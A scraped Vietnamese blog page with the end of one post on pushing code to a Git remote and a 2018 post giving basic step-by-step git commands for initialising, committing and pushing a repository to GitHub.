Bước 5: Để push code lên bạn có thể dùng lệnh:

git push origin master

Nếu bạn muốn add các phần thay đổi thì dùng các lệnh sau:

git add -A

git commit -am “x”

Sau đó đẩy code lên.

Bạn hoàn toàn có thể viết chương trình tự động để đẩy việc này hàng ngày bằng cách set crontab.

Chúc bạn thành công.

 

Hướng dẫn sử dụng GIT

 Programing  Comments Off on Hướng dẫn sử dụng GIT
Jan 262018
 

 

 1. Initialize the local directory as a Git repository.
  git init
  
 2. Add the files in your new local repository. This stages them for the first commit.
  git add .
  # Adds the files in the local repository and stages them for commit. To unstage a file, use 'git reset HEAD YOUR-FILE'.
  
 3. Commit the files that you’ve staged in your local repository.
  git commit -m "First commit"
  # Commits the tracked changes and prepares them to be pushed to a remote repository. To remove this commit and modify the file, use 'git reset --soft HEAD~1' and commit and add the file again.
  
 4. Copy remote repository URL fieldAt the top of your GitHub repository’s Quick Setup page, click  to copy the remote repository URL.
 5. In the Command prompt, add the URL for the remote repository where your local repository will be pushed.
  git remote add origin remote repository URL
  # Sets the new remote
  git remote -v
  # Verifies the new remote URL
  
 6. Push the changes in your local repository to GitHub.
  git push origin master
  # Pushes the changes in your local repository up to the remote repository you specified as the origin